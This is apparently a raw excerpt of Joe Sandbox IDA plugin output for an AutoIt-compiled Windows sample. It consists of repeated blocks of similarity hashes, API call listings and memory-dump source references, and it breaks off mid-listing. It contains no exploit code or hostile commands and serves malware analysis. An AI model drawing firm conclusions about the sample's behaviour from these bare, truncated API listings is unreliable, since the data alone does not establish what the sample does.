                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: 198adb0af4fcc837f33b381fbb47a1a4a6436b8187ef7a83124030ec05cfcd9f
                                                                                                                • Instruction ID: ee11a7fd95b7a478ac7b8d44b165908166777d17d2c22bc8d7db6a99e0efb05c
                                                                                                                • Opcode Fuzzy Hash: 198adb0af4fcc837f33b381fbb47a1a4a6436b8187ef7a83124030ec05cfcd9f
                                                                                                                • Instruction Fuzzy Hash: 00918E72408301FFD710AFA4DC08E5B7BAAFF89321F141B2AF9A2961A1D771D945CB52
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?), ref: 00602CA2
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00602CE8
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00602CF3
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00602CFE
                                                                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00602D09
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0063C43B
                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063C474
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0063C89D
                                                                                                                  • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                                                                                • SendMessageW.USER32(?,00001053), ref: 0063C8DA
                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063C8F1
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063C907
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063C912
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 464785882-4108050209
                                                                                                                • Opcode ID: 8a970c0f918ce1c530399d6538d0bfcac19cf88ee8c2fb32a53936efd189f1d3
                                                                                                                • Instruction ID: 99b98d17fea351cf5e1c807dc8047e2da2e07e07b78008fa9932c532ba434734
                                                                                                                • Opcode Fuzzy Hash: 8a970c0f918ce1c530399d6538d0bfcac19cf88ee8c2fb32a53936efd189f1d3
                                                                                                                • Instruction Fuzzy Hash: 97129F30600202EFDB55CF24C898BAABBE6FF45324F544569F855EB2A2C731EC52CB91
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 006774DE
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0067759D
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006775DB
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006775ED
                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00677633
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0067763F
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00677683
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00677692
                                                                                                                • GetStockObject.GDI32(00000011), ref: 006776A2
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 006776A6
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006776B6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006776BF
                                                                                                                • DeleteDC.GDI32(00000000), ref: 006776C8
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006776F4
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0067770B
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00677746
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0067775A
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0067776B
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0067779B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 006777A6
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006777B1
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006777BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: 50e3648644182194b8cb4bb2b3759e76bca7059f0a5bdbbb8caffad3d8a2cd09
                                                                                                                • Instruction ID: dc02eec89f9f0c9e2199d4129778b27aa30d81acbf871d0f8c4663ecd1172e2a
                                                                                                                • Opcode Fuzzy Hash: 50e3648644182194b8cb4bb2b3759e76bca7059f0a5bdbbb8caffad3d8a2cd09
                                                                                                                • Instruction Fuzzy Hash: A2A140B1A40615BFEB14DBA4DC4AFAF7BBAEB04710F108214FA15A72E1D774AD40CB64
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0066AD1E
                                                                                                                • GetDriveTypeW.KERNEL32(?,0068FAC0,?,\\.\,0068F910), ref: 0066ADFB
                                                                                                                • SetErrorMode.KERNEL32(00000000,0068FAC0,?,\\.\,0068F910), ref: 0066AF59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: f81ec66fa7015f014a9caf0f87d02b628802bccd6b4abaffea2abef66942376c
                                                                                                                • Instruction ID: 60010d8feebb0db27826bd91edc3dde224da05629296027f5b15fcdfd552ea0d
                                                                                                                • Opcode Fuzzy Hash: f81ec66fa7015f014a9caf0f87d02b628802bccd6b4abaffea2abef66942376c
                                                                                                                • Instruction Fuzzy Hash: FE514FF0644245AFCB54EFE0C992CFAB3A7EF48700B21445AE406B7291DA719D82EF53
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: a9a0ebf112c752f07e1e8d74e51c30d982901524aefa1bfe3d30941999bd40fb
                                                                                                                • Instruction ID: cc2c4f7c1ab5fc6fab49ea68df882a457e8073c39411315c2ce75d9e7c40682e
                                                                                                                • Opcode Fuzzy Hash: a9a0ebf112c752f07e1e8d74e51c30d982901524aefa1bfe3d30941999bd40fb
                                                                                                                • Instruction Fuzzy Hash: 8D8129B06802167ADF14BB60EC42FEB376BAF14700F044028F901AB6D6EB71DE55C6A9
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00689AD2
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00689B8B
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 00689BA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                • Opcode ID: 94fb89c0af9df527537be7d79725b09d6e8af16dfa857ef93191e58286620e27
                                                                                                                • Instruction ID: 99e96bf1513d161cefb1d93284d1803c4cdf9c366e80b6b88e8d9e9dd49f0bf2
                                                                                                                • Opcode Fuzzy Hash: 94fb89c0af9df527537be7d79725b09d6e8af16dfa857ef93191e58286620e27
                                                                                                                • Instruction Fuzzy Hash: 7F02BC30104201AFE729EF24C849BBABBE6FF49314F08872DF995962A1D775D944CB62
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 0068A903
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0068A907
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0068A91D
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0068A928
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0068A92D
                                                                                                                • GetSysColor.USER32(00000011), ref: 0068A945
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068A953
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0068A964
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0068A96D
                                                                                                                • SelectObject.GDI32(?,?), ref: 0068A97A
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0068A999
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068A9B0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0068A9C5
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068A9ED
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068AA14
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0068AA32
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 0068AA3D
                                                                                                                • GetSysColor.USER32(00000011), ref: 0068AA4B
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0068AA53
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068AA67
                                                                                                                • SelectObject.GDI32(?,0068A5FA), ref: 0068AA7E
                                                                                                                • DeleteObject.GDI32(?), ref: 0068AA89
                                                                                                                • SelectObject.GDI32(?,?), ref: 0068AA8F
                                                                                                                • DeleteObject.GDI32(?), ref: 0068AA94
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0068AA9A
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0068AAA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: c6d908a01e3747eeaba4e5043acff2c21f0e3d1fd82a50104253e9fbf5d88ce0
                                                                                                                • Instruction ID: a15d624d4e242d79dbb22b4b72ca9b35a5ebc09e5cdfca73fdb135f8fc9226ee
                                                                                                                • Opcode Fuzzy Hash: c6d908a01e3747eeaba4e5043acff2c21f0e3d1fd82a50104253e9fbf5d88ce0
                                                                                                                • Instruction Fuzzy Hash: 0D512E71901208FFDF119FA4DC48EAE7B7AEF08320F215626F915AB2A1D7759940DF90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00688AC1
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688AD2
                                                                                                                • CharNextW.USER32(0000014E), ref: 00688B01
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00688B42
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00688B58
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688B69
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00688B86
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00688BD8
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00688BEE
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00688C1F
                                                                                                                • _memset.LIBCMT ref: 00688C44
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00688C8D
                                                                                                                • _memset.LIBCMT ref: 00688CEC
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00688D16
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00688D6E
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00688E1B
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00688E3D
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00688E87
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00688EB4
                                                                                                                • DrawMenuBar.USER32(?), ref: 00688EC3
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00688EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                • Opcode ID: 2ee987e1f2e379a7512bfcedac59d97202c206d6a71d58944011701d08e83784
                                                                                                                • Instruction ID: 97434da405ec1ff6505269592c3c5fc121d7e85014f63bd2579a6d91be1da973
                                                                                                                • Opcode Fuzzy Hash: 2ee987e1f2e379a7512bfcedac59d97202c206d6a71d58944011701d08e83784
                                                                                                                • Instruction Fuzzy Hash: FAE18274900219AFDF20EF54CC84EEE7BBAEF05750F50825AFA15AB291DB709981DF60
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 006849CA
                                                                                                                • GetDesktopWindow.USER32 ref: 006849DF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 006849E6
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00684A48
                                                                                                                • DestroyWindow.USER32(?), ref: 00684A74
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00684A9D
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00684ABB
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00684AE1
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00684AF6
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00684B09
                                                                                                                • IsWindowVisible.USER32(?), ref: 00684B29
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00684B44
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00684B58
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00684B70
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00684B96
                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00684BB0
                                                                                                                • CopyRect.USER32(?,?), ref: 00684BC7
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00684C32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: c9f61c07b298968e9f32894274f4327b00aae18a12d70f79845a4cdb0ed3fd4c
                                                                                                                • Instruction ID: df8cfaa53674fc2908b8ef9cf601b5577a4dd4b3b0d71026de712339bbde82d1
                                                                                                                • Opcode Fuzzy Hash: c9f61c07b298968e9f32894274f4327b00aae18a12d70f79845a4cdb0ed3fd4c
                                                                                                                • Instruction Fuzzy Hash: 16B17B71604341AFDB48EF64C844B6BBBE6BF88314F008A1CF5999B2A1DB71EC05CB55
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006644AC
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006644D2
                                                                                                                • _wcscpy.LIBCMT ref: 00664500
                                                                                                                • _wcscmp.LIBCMT ref: 0066450B
                                                                                                                • _wcscat.LIBCMT ref: 00664521
                                                                                                                • _wcsstr.LIBCMT ref: 0066452C
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00664548
                                                                                                                • _wcscat.LIBCMT ref: 00664591
                                                                                                                • _wcscat.LIBCMT ref: 00664598
                                                                                                                • _wcsncpy.LIBCMT ref: 006645C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                • Opcode ID: 9c2576c468a6eda7ad5358d06a0b44dba5264f063a8b7b4e98127bd8809fb565
                                                                                                                • Instruction ID: 2b9397b53d56eda20e5b7198d937a34e64a7e5c5fac95dfe3af5455e50f36759
                                                                                                                • Opcode Fuzzy Hash: 9c2576c468a6eda7ad5358d06a0b44dba5264f063a8b7b4e98127bd8809fb565
                                                                                                                • Instruction Fuzzy Hash: 4E41D3719002217BEB54BB74EC43EFF77AEDF41710F04056AF905E6282EE349A419BA9
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028BC
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 006028C4
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028EF
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 006028F7
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0060291C
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00602939
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00602949
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0060297C
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00602990
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 006029AE
                                                                                                                • GetStockObject.GDI32(00000011), ref: 006029CA
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 006029D5
                                                                                                                  • Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
                                                                                                                  • Part of subcall function 00602344: ScreenToClient.USER32(006C57B0,?), ref: 00602374
                                                                                                                  • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                                                                                  • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00601256), ref: 006029FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: b0ead6b822bc87ae4837669a9fa32ca963f73ad918f8241fe5214c47fe89eb69
                                                                                                                • Instruction ID: 8f0f913e7e4d74ea8c406a89237b89b3a3cd14551f8626f985c07b9e4b8fe576
                                                                                                                • Opcode Fuzzy Hash: b0ead6b822bc87ae4837669a9fa32ca963f73ad918f8241fe5214c47fe89eb69
                                                                                                                • Instruction Fuzzy Hash: 90B15F7564020AEFDB18DF68DC59BAE7BB6FF08314F104229FA16A62D0DB74E851CB50
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0065A47A
                                                                                                                • __swprintf.LIBCMT ref: 0065A51B
                                                                                                                • _wcscmp.LIBCMT ref: 0065A52E
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065A583
                                                                                                                • _wcscmp.LIBCMT ref: 0065A5BF
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0065A5F6
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0065A648
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0065A67E
                                                                                                                • GetParent.USER32(?), ref: 0065A69C
                                                                                                                • ScreenToClient.USER32(00000000), ref: 0065A6A3
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0065A71D
                                                                                                                • _wcscmp.LIBCMT ref: 0065A731
